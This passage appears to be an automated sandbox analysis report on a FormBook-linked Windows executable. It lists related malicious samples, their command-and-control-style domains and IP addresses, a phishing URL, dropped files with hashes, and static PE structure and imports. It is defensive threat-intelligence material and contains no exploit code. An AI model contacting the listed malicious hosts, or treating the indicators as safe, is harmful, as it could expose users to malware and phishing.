                                                                      • www.yushaliu.online/fjsq/
                                                                      D7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                      • www.7fty.space/mh5s/
                                                                      ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                      • www.willtriallawyers.net/tk4w/
                                                                      QNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.themessageart.online/1j0s/
                                                                      rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                      • www.molepunch.online/ya3k/
                                                                      EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                      • www.crochetpets.online/25cq/
                                                                      EqszHzzNn5.exeGet hashmaliciousFormBookBrowse
                                                                      • www.antura.partners/62gk/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.falconclub.onlineTUj6dgsTTR.exeGet hashmaliciousFormBookBrowse
                                                                      • 74.208.236.25
                                                                      zmhPgbED7M.exeGet hashmaliciousFormBookBrowse
                                                                      • 74.208.236.25
                                                                      N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                      • 74.208.236.25
                                                                      www.demovix.xyzTUj6dgsTTR.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.19.19
                                                                      zmhPgbED7M.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.19.19
                                                                      N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.192.19.19
                                                                      www.palcoconnector.netN2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      POWERLINE-AS-APPOWERLINEDATACENTERHKh0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.251.7.171
                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                      • 154.92.61.37
                                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 154.216.83.133
                                                                      nullnet_load.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.243.251.8
                                                                      nullnet_load.spc.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.242.206.38
                                                                      nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.250.157.174
                                                                      Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                      • 160.124.134.116
                                                                      .main.elfGet hashmaliciousXmrigBrowse
                                                                      • 154.213.192.3
                                                                      v6pwbOEUpl.elfGet hashmaliciousUnknownBrowse
                                                                      • 154.92.66.248
                                                                      x86_64.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.251.3.9
                                                                      NTT-LT-ASLTch89yHIa99.exeGet hashmaliciousDucktailBrowse
                                                                      • 84.32.84.33
                                                                      ub7ZX9i3k6.exeGet hashmaliciousDucktailBrowse
                                                                      • 84.32.84.33
                                                                      uupEsxBhAI.exeGet hashmaliciousDucktailBrowse
                                                                      • 84.32.84.33
                                                                      yfM67N9UUL.exeGet hashmaliciousDucktailBrowse
                                                                      • 84.32.84.33
                                                                      Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                      • 84.32.84.32
                                                                      proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                      • 84.32.84.32
                                                                      Wc7HGBGZfE.exeGet hashmaliciousFormBookBrowse
                                                                      • 84.32.84.32
                                                                      FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                      • 84.32.84.136
                                                                      icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                      • 84.32.84.32
                                                                      https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                                                                      • 84.32.84.121
                                                                      ONEANDONE-ASBrauerstrasse48DEhttps://google.com:login@login-zendesk-account.servz.com.pk/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 212.227.67.33
                                                                      sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 195.20.246.173
                                                                      3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.160.0.93
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 74.208.236.140
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 74.208.236.140
                                                                      Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 217.160.0.132
                                                                      http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.comGet hashmaliciousHTMLPhisherBrowse
                                                                      • 74.208.239.192
                                                                      unb4AWV6Fe.exeGet hashmaliciousFormBookBrowse
                                                                      • 212.227.247.44
                                                                      FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.160.0.142
                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                      • 217.76.156.252
                                                                      CONFLUENCE-NETWORK-INCVGHesap.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      D7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      QNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      Stadigheder43.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 66.81.203.200
                                                                      Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 208.91.197.27
                                                                      SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27
                                                                      Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 208.91.197.27
                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                      • 208.91.197.27

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\0J030901P

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\RpcPing.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\brawlys

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\xBzBOQwywT.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):288256
                                                                      Entropy (8bit):7.995224158142
                                                                      Encrypted:true
                                                                      SSDEEP:6144:+bB2xfPwkPHnFW3RYb5aHiZ5RefBdtSajTX6A4Bp4fPu8ynNDSGQU:+bUx3wkfnFWXiPRevDM4fanJSG/
                                                                      MD5:53BA17D083E2CEE6D7792DAD774DE28C
                                                                      SHA1:2583E56C7CB57EC92113B48584508C1CE45C9DE8
                                                                      SHA-256:CCB8EB6A0DE026995A685E52B80238B7C3F3798982CB88F6D0815693968D2F51
                                                                      SHA-512:43CEBD5003106D68DC88D766003E3202214FF362403B1416D3AE6772BBADC21894D8F9C57A1A5ADDC0CA5B95984F1D31A2FE02CE1E6451DF10FF2B47C7501222
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.....X9WR...G......KD....TZ...NV8N52SKGP1X9WRC3JNV8N52SKGP1X.WRC=U.X8.<.r.F..ym?;0.:<9_<T_s(&>_7Mw0&.8;8.'[....p\7]2|N>@jV8N52SK>Q8..75..*)...R.I...8^.H.r6_./...{0V.k>1+.*).8N52SKGPa.9W.B2J2.p.52SKGP1X.WPB8KEV8.12SKGP1X9W"W3JNF8N5BWKGPqX9GRC3HNV>N52SKGP7X9WRC3JN&<N50SKGP1X;W..3J^V8^52SKWP1H9WRC3J^V8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52}?"(EX9WF.7JNF8N5fWKG@1X9WRC3JNV8N52sKG01X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC3JNV8N52SKGP1X9WRC

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.5247721235195915
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:xBzBOQwywT.exe
                                                                      File size:1'332'289 bytes
                                                                      MD5:715ec2a53173921888b38c9731ad9bc9
                                                                      SHA1:710e6e31cbee07deb127ac9b70a4b1a31cc498f3
                                                                      SHA256:648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef
                                                                      SHA512:e5da1ed4b05c37e0692806e6f4fd5aba23f300c7c6e5caa9ac32f7c3dc49a64d26a52b44987376b65afd522888e1f2c34666d394ae7520125e6e15d6c33f83fc
                                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC3qMDR35EktuWjfj2q+XRrtdNaAgz2JHJ:7JZoQrbTFZY1iaC3qhktuUjn+BwAQ21J
                                                                      TLSH:8955E122B5D69036C2B333B19E7FF765963D69360336D29B23C82D215EA05816B39733
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                      File Icon

                                                                      Icon Hash:1733312925935517

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4165c1
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007FF54D19E1ABh
                                                                      jmp 00007FF54D19501Eh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                      mov ecx, dword ptr [ebp+10h]
                                                                      mov edi, dword ptr [ebp+08h]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007FF54D19519Ah
                                                                      cmp edi, eax
                                                                      jc 00007FF54D195336h
                                                                      cmp ecx, 00000080h
                                                                      jc 00007FF54D1951AEh
                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                      je 00007FF54D1951A5h
                                                                      push edi
                                                                      push esi
                                                                      and edi, 0Fh
                                                                      and esi, 0Fh
                                                                      cmp edi, esi
                                                                      pop esi
                                                                      pop edi
                                                                      jne 00007FF54D195197h
                                                                      jmp 00007FF54D195572h
                                                                      test edi, 00000003h
                                                                      jne 00007FF54D1951A6h
                                                                      shr ecx, 02h
                                                                      and edx, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007FF54D1951BBh
                                                                      rep movsd
                                                                      jmp dword ptr [00416740h+edx*4]
                                                                      mov eax, edi
                                                                      mov edx, 00000003h
                                                                      sub ecx, 04h
                                                                      jc 00007FF54D19519Eh
                                                                      and eax, 03h
                                                                      add ecx, eax
                                                                      jmp dword ptr [00416654h+eax*4]
                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                      nop
                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                      nop
                                                                      inc cx
                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                      inc cx
                                                                      add byte ptr [ebx], ah
                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                      inc esi
                                                                      add dword ptr [eax+468A0147h], ecx
                                                                      add al, cl
                                                                      jmp 00007FF54F60D997h
                                                                      add esi, 03h
                                                                      add edi, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007FF54D19515Eh
                                                                      rep movsd
                                                                      jmp dword ptr [00000000h+edx*4]

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2010 SP1 build 40219
                                                                      • [C++] VS2010 SP1 build 40219
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2010 SP1 build 40219
                                                                      • [RES] VS2010 SP1 build 40219
                                                                      • [LNK] VS2010 SP1 build 40219

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                      Imports

                                                                      DLLImport
                                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
